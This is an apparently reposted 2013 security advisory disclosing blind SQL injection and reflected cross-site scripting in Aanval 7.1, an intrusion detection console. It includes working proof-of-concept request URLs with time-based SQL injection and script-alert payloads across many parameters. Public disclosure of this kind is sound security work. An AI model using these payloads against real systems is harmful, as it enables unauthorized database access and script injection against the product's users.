Aanval 7.1 Build 70151 SQL Injection / Cross Site Scripting

2013.10.04
Credit: xistence
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

----------- Author: ----------- xistence < xistence[at]0x90[.]nl > ------------------------- Affected products: ------------------------- Aanval 7.1 build 70151 ------------------------- Affected vendors: ------------------------- Aanval http://www.aanval.com/ https://www.aanval.com/download/pickup ------------------------- Product description: ------------------------- Aanval is the industry's most comprehensive Snort and Syslog Intrusion Detection, Correlation, and Threat Management console on the market. Aanval supports both Snort and Suricata, as well as virtually any Syslog data source, and is designed specifically to scale from small-single sensor installations to global enterprise deployments. Aanval's primary function is to correlate data from multiple sources, bring together billions of events, and present users with a holistic view of false-positive free, network security situational awareness. ---------- Details: ---------- Aanval 7.1 build 70151 is prone to multiple vulnerabilities. Below are the details. [ 0x01 - Blind SQL Injection ] The "id" and "query" parameters are vulnerable to blind SQL injection. The proof of concept below does a sha1 benchmark on the value "1". This will take a couple of seconds to process in most situations and thus shows that the injection works. http:// <IP>/aanval/?op=prv_myReports&id=2'%20and%20benchmark(20000000%2csha1(1))--%20 http:// <IP>/aanval/?op=prv_eventSearch&query=%20report:'%2bbenchmark(20000000%2csha1(1))%2b' [ 0x02 - Reflected XSS ] The following requests are vulnerable to "Cross Site Scripting" and will show a pop-up with the word "XSS". http://<IP>/aanval/?op=prv_eventSearch&dip=<script>alert('XSS')</script> http://<IP>/aanval/?op=prv_eventSearch&dport=%0Aalert('XSS')// http://<IP>/aanval/?num=<script>alert('XSS')</script> http://<IP>/aanval/?op=prv_eventSearch&protocol=%0Aalert('XSS')// http:// <IP>/aanval/?op=prv_eventSearch&query=%20report:31337%0aalert('XSS')// http://<IP>/aanval/?op=prv_eventSearch&risk=%0Aalert('XSS')// http://<IP>/aanval/?op=prv_eventSearch&sip=<script>alert('XSS')</script> http://<IP>/aanval/?op=prv_eventSearch&sport=%0aalert('XSS')// http://<IP>/aanval/?op=prv_eventSearch&string=<script>alert('XSS')</script> http:// <IP>/aanval/?op=prv_eventSearchResults&transaction="><script>alert('XSS')</script> ----------- Solution: ----------- No fix available, use a good WAF :) -------------- Timeline: -------------- 2013-08-16 Provided details to Aanval support. Ticket is created. 2013-09-19 Asked for status update. 2013-09-26 No response yet, asked for status update again. 2013-10-04 Still no response, public disclosure.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top